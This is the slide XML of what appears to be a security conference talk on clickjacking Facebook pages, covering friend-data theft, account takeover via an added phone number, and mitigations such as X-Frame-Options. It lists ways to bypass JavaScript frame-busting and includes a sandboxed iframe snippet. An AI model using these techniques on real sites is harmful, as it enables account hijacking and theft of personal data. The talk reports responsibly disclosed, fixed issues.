          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about mobile sites?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>support</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can the JavaScript protection be disabled or neutered?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE8/IE9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>security="restricted”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chrome/Safari/IE9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox/Chrome/Safari</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Activate designMode in parent page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>view-source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE/Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using XSS filter to cut out script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1301701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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://m.facebook.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>profile.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" sandbox="allow-forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"&gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4"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971800"/>
            <a:ext cx="6051039"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123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What?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creativity happens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can we do anything interesting? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197617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Stealing Someone’s Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\mopey\Desktop\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89837" cy="527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784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038" y="2952750"/>
            <a:ext cx="92392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21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Stealing Someone’s Information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8543925"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988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Stealing Someone’s Information</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399"/>
            <a:ext cx="5791200" cy="531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72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Stealing Someone’s Information</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391400" cy="513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mopey\Desktop\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589837" cy="527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495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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="C:\Users\mopey\Desktop\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73147"/>
            <a:ext cx="7703996" cy="508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12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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Stolen?</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399"/>
            <a:ext cx="5791200" cy="531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76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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Was my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Stolen?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="cj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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50418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my Information Stolen?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="C:\Users\mopey\Desktop\mop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09" y="2133600"/>
            <a:ext cx="8994631" cy="36947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4230414"/>
            <a:ext cx="15240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60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my Information Stolen?</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952130"/>
            <a:ext cx="17145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66901"/>
            <a:ext cx="17145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90800" y="2311266"/>
            <a:ext cx="4114800" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You look incredibly sketchy. I would never friend you. Anyway, I do click on links. *clicks*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BAM.  You just friended me with clickjacking. I now see who you are and can take all of your info.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I don’t see anything out of the ordinary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BAM. That’s because you’re already unfriended. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589126" y="4319460"/>
            <a:ext cx="15240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956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my Information Stolen?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There were some tricks behind the scenes that took some time. Thanks to Brig my wife!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to follow the mouse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to detect a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>click</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python script to run server side (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) to login as Mopey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mcmopster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, scrape new friend requests, steal their information, and unfriend them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser specific exploit, but issue is exploitable on all browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different tricks/APIs are sometimes needed for different browsers (including phones)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1109645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Jesse Ou asks: “What else can we do with Facebook clickjacking?”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1842195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New Low Hanging Fruit, since we broke down and got that extension ladder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752600"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At Microsoft, we sometimes have a dedicated security engineer to help with this deceptively difficult problem. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What can happen with a framed page?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same origin policies?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML Processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What could go wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357591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Taking Over Someone’s Account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36766"/>
            <a:ext cx="8724647"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05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Taking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone’s Account</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7737822"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106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Taking Over Someone’s Account</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8287597"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74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Taking Over Someone’s Account</a:t>
            </a:r>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7815" y="1600200"/>
            <a:ext cx="818836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137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Taking Over Someone’s Account</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883" y="1219200"/>
            <a:ext cx="723676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253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1275079"/>
            <a:ext cx="6943725"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Taking Over Someone’s Account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3784146"/>
            <a:ext cx="1143000" cy="4830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83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Taking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone’s Account</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7815" y="1600200"/>
            <a:ext cx="818836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50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32" y="1362075"/>
            <a:ext cx="6943725"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Taking Over Someone’s Account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762001" y="3870642"/>
            <a:ext cx="1143000" cy="3783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201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Taking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone’s Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="clickjack.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95400" y="1447800"/>
            <a:ext cx="6521450" cy="4891517"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1764618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Taking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone’s Account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725" y="1447800"/>
            <a:ext cx="702945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83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and Mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No companies were harmed in the making of this presentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All vulnerabilities presented here were disclosed responsibly to the teams or companies (through MSVR), and have since been mitigated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The issues here are generic, and for every specific case presented here, the same issue has been seen in multiple places.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291452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Taking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone’s Account</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05000"/>
            <a:ext cx="6172200" cy="427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57400" y="3200400"/>
            <a:ext cx="1295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71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Taking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone’s Account</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16" y="2133600"/>
            <a:ext cx="723900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676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Taking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone’s Account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744855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79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Recap</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952130"/>
            <a:ext cx="17145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66901"/>
            <a:ext cx="17145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90800" y="3230174"/>
            <a:ext cx="4114800" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*clicks on a link*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BAM.  I added my mobile phone to your account and then used it to reset your password and take over your account. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467600" y="4314205"/>
            <a:ext cx="152400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204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Mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We worked with Facebook to mitigate the issue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Several of the vulnerable pages were immediately taken offline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We recommended X-FRAME-OPTIONS be put on the sensitive pages that should never be framed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They now require a password to add a mobile phone number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We’ve found similarly bad things to do with click-jacking on Microsoft products. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mitigations were similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-FRAME-OPTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In-depth security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-FRAME-OPTIONS is a great mitigation, but doesn’t work in all places. Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“like” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buttons, for example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if you have legitimate sites that need framing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is an IETF draft to add an ALLOW-FROM option which would make this more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flexible</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3166795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Wall of Sheep</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199"/>
            <a:ext cx="702945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779" y="4817423"/>
            <a:ext cx="650557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57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305800" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>ot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>sers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>ot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>heir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>ookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242375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Cookie tossing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>orst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
